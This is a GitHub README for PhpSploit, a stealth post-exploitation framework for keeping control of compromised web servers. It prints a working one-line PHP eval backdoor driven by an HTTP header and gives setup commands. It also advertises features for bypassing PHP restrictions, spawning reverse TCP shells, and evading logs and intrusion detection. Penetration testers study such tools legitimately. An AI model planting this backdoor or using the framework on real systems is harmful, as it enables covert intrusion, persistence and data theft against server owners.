GitHub - yssam-mtibaa/phpsploit: Stealth post-exploitation framework

PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

Efficient: More than 20 plugins to automate post-exploitation tasks
- Run commands and browse filesystem, bypassing PHP security restrictions
- Upload/Download files between client and target
- Edit remote files through local text editor
- Run SQL console on target system
- Spawn reverse TCP shells
Stealth: The framework is made by paranoids, for paranoids
- Nearly invisible by log analysis and NIDS signature detection
- Safe-mode and common PHP security restrictions bypass
- Communications are hidden in HTTP Headers
- Loaded payloads are obfuscated to bypass NIDS
- http/https/socks4/socks5 Proxy support
Convenient: A robust interface with many crucial features
- Detailed help for any command or option (type help)
- Cross-platform on both the client and the server.
- Powerful interface with completion and multi-command support
- Session saving/loading feature & persistent history
- Multi-request support for large payloads (such as uploads)
- Provides a powerful, highly configurable settings engine
- Each setting, such as user-agent has a polymorphic mode
- Customisable environment variables for plugin interaction
- Provides a complete plugin development API

Supported platforms (as attacker):

GNU/Linux
Mac OS X

Supported platforms (as target):

GNU/Linux
BSD Like
Mac OS X
Windows NT

Contributors

Thanks goes to these people (emoji key):

_nil0x42 💻 🚇 🔌 ⚠️	_shiney-wh 💻 🔌	_{Wannes Rombouts} 💻 🚧	_{Amine Ben Asker} 💻 🚧	_{jose nazario} 📖 🐛	_{Sujit Ghosal} 📝	_Zerdoumi 🐛
_{tristandostaler} 🐛	_{Rohan Tarai} 🐛

This project follows the all-contributors specification. Contributions of any kind welcome!

Name		Name	Last commit message	Last commit date
Latest commit History 905 Commits
data		data
deps		deps
docs		docs
man		man
plugins		plugins
src		src
test		test
utils		utils
.all-contributorsrc		.all-contributorsrc
.codacy.yml		.codacy.yml
.codeclimate.yml		.codeclimate.yml
.codecov.yml		.codecov.yml
.coveragerc		.coveragerc
.editorconfig		.editorconfig
.gitignore		.gitignore
.lgtm.yml		.lgtm.yml
.remarkrc		.remarkrc
.travis.yml		.travis.yml
CHANGELOG.md		CHANGELOG.md
CONTRIBUTE		CONTRIBUTE
DISCLAIMER		DISCLAIMER
INSTALL.md		INSTALL.md
LICENSE		LICENSE
README.md		README.md
TODO		TODO
phpsploit		phpsploit
requirements.txt		requirements.txt

License

yssam-mtibaa/phpsploit

Folders and files

Latest commit

History

Repository files navigation

PhpSploit: Furtive post-exploitation framework

Overview

Quick Start

Features

Supported platforms (as attacker):

Supported platforms (as target):

Contributors

About

Resources

License

Stars

Watchers

Forks

Languages